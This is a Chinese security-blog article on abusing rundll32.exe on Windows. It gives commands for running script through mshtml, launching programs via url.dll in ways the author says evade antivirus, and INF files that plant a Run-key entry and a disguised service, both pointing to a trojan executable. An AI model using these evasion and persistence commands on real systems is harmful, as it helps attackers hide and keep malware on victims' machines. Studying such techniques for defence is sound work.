命令行下的“蒙面歌王”rundll32.exe

*本文原创作者:lcx,本文属FreeBuf原创奖励计划,未经许可禁止转载 **

在Windows系统中,为了节省内存和实现代码重用,微软在Windows操作系统中实现了一种共享函数库的方式。这就是DLL(Dynamic Link Library)文件,即动态链接库,这种库包含了可由多个程序同时使用的代码和数据。Rundll.exe 和 Rundll32.exe 的命令行实用程序,通过这两个程序可调用从16位或32位DLL导出的函数。现在Rundll.exe 基本被淘汰,rundll32.exe格式为:RUNDLL32.EXE , 。这本来是微软的一个正常的命令,但是在黑客手里会发生巨大的作用,有些命令不为外人所知,堪称命令行下的蒙面歌王,我为大家来揭面一下,让大家知道它的不为人知的几个功能。

一、用C++如何写一个简单的被Rundll32.exe调用的dll

我用Visual studio 2017写了一个简单的代码,内容如下:

// Dll3.cpp: 定义 DLL 应用程序的导出函数。
//

#include "stdafx.h"
#include <atlstr.h>

extern "C" __declspec(dllexport)
void F2(
    HWND hwnd,        // handle to owner window   
    HINSTANCE hinst,  // instance handle for the DLL   
    LPTSTR lpCmdLine, // string the DLL will parse   
    int nCmdShow      // show state   
)
{
    if (strlen(lpCmdLine) != 0)
    {
        CString num;
        num = lpCmdLine;
        MessageBox(0, "Message body", num ,MB_OK);
    }
    else
    {
        MessageBox(0, "Message body", "Message title", MB_OK);

    }
}

全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。

二、用Rundll32.exe运行js或vbs的脚本代码

rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.execScript("msgbox('a')","vbs");window.close()

动画里这条命令烂大街了,已经绕不过我本机的火绒了。

三、用Rundll32.exe执行命令绕过杀毒软件的作法

命令如下:

rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exerundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exerundll32 url.dll, FileProtocolHandler calc.exe

这是经过反汇编分析url.dll得出的结果,请记住这3条命令,活学活用,这是干货。上边的三条命令都可以绕开我本机的火绒。你可以多分析system32下的dll,说不定你还有惊喜。

四、用Rundll32.exe修改注册表

写一个c:/reg.inf文件,增加注册表启动项,代码如下:

[Version]Signature="$WINDOWS NT$"[DefaultInstall]AddReg=My_AddReg_NameDelReg=My_DelReg_Name[My_AddReg_Name]HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun,0x00000000,c:/muma.exe

然后我们运行

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf

就可以增加一个键为KAVRun,值为c:/muma.exe的注册表项了。

删掉刚才加的注册表启动项,c:\reg.inf内容如下:

[Version]Signature="$WINDOWS NT$"[DefaultInstall]AddReg=My_AddReg_NameDelReg=My_DelReg_Name[My_DelReg_Name]HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun

运行以下命令就可以删掉了

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf

几点说明:

  1. [Version]和[DefaultInstall]是必须的,AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。
  2. 0x00010001表示REG_DWORD数据类型,0x00000000或省略该项(保留逗号)表示REG_SZ(字符串)。0x00020000表示REG_EXPAND_SZ。关于inf文件的详细信息,可以参考DDK帮助文档。
  3. InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号,没有空格。128表示给定路径,该参数其他取值及含义参见MSDN。特别注意,最后一个参数,必须是inf文件的全路径,不要用相对路径。
  4. inf文件中的项目都是大小写不敏感的。

五、使用rundll32.exe 增加一个服务

写一个srv.inf,内容如下:

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=提供对 Internet 信息服务管理的支持。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\muma.exe

然后执行命令,会增加一个名字为inetsvr的服务。

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/srv.inf

几点说明:

  1. ServiceType表示服务类型:0x10为独立进程服务,0x20为共享进程服务(比如svchost);
  2. StartType表示启动类型:0 系统引导时加载,1 OS初始化时加载,2 由SCM(服务控制管理器)自动启动,3 手动启动,4 禁用。
  3. ErrorControl表示错误控制:0 忽略,1 继续并警告,2 切换到LastKnownGood的设置,3 蓝屏。
  4. ServiceBinary里的服务程序位置:%11%表示system32目录,%10%表示系统目录(WINNT或Windows),%12%为驱动目录system32\drivers。其他取值参见DDK。你也可以不用变量,直接使用全路径。
  5. 这四项是必须要有的。

删除刚才增加的服务,写一个dsrv.inf,内容如下:

[Version]        Signature="$WINDOWS NT$"[DefaultInstall.Services]DelService=inetsvr

执行完以下命令就会删掉了

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/dsrv.inf

INF的具体参数是请查看DDK相关资料。

六、网上老生常谈的rundll32的几十个常用快捷命令了,可能有些人并不清楚

命令列: rundll32.exe shell32.dll,Control_RunDLL

功能: 显示控制面板

命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1

功能: 显示“控制面板-辅助选项-键盘”选项视窗

命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2

功能: 显示“控制面板-辅助选项-声音”选项视窗

……

还有太多太多,我如果写在文章里就全是水份了,具体其它命令请参阅:老生常谈的一些命令

另:本文中的修改注册表和增删服务参考了zzzevazzz的《Do All in Cmd Shell (一切尽在命令行)》部分内容,表示感谢。

*本文原创作者:lcx,本文属FreeBuf原创奖励计划,未经许可禁止转载

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2018-01-29

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏魏琼东

应用SAAS结构技术的开源药店管理系统-如何自己部署这种SOA/SAAS结构的应用

一、药店系统内容说明 在前些时间,我们发布了一个基于AgileEAS.NET平台的SAAS结构的案例-AgileEAS.NET平台开发实例-药店系统-快速的SA...

444100
来自专栏码洞

如何优雅的关闭Go Channel【译】

不要在消费端关闭channel,不要在有多个并行的生产者时对channel执行关闭操作。

28440
来自专栏拂晓风起

cocos2d-js 调试办法 断点调试 Android真机调试

20720
来自专栏施炯的IoT开发专栏

Building Apps for Windows 10 on LattePanda–Jump Start

1.引言     目前来看,LattePanda应该是最小的运行Full Windows 10系统的开发板了(注意,不是Windows 10 for Mobil...

20480
来自专栏信安之路

网络安全渗透测试

针对网络的渗透测试项目一般包括:信息收集、端口扫描、指纹识别、漏洞扫描、绘制网络拓扑、识别代理、记录结果等。下面就一一介绍。

23900
来自专栏黑泽君的专栏

day51_BOS项目_03

将上面的js文件引入所需要的jsp页面中,本例以index.jsp为例 /bos19/WebContent/WEB-INF/pages/common/inde...

8810
来自专栏FreeBuf

如何用橡皮鸭绕过杀软、渗透Win 7?

本文将演示如何使用USB Rubber Ducky和unicorn攻击一台运行AVG2015杀毒软件并且补丁全部打上的Windows 7电脑。本教程仅供学习,请...

27370
来自专栏cs

oracle12c,各种问题解决方案

近来重装了计算机(双系统windows10+ubuntu16),顺带着也把software升级一下,结果安装最新的oracle12c,出现了一系列问题,我不喜...

67540
来自专栏Adamshuang 技术文章

Zookeeper 通知更新可靠吗? 解读源码找答案!

遇到Keepper通知更新无法收到的问题,思考节点变更通知的可靠性,通过阅读源码解析了解到zk Watch的注册以及触发的机制,本地调试运行模拟zk更新的不可靠...

1.2K80
来自专栏Eugene's Blog

黑客常用的扫描器盒子分类目录文章标签友情链接联系我们

34090

扫码关注云+社区

领取腾讯云代金券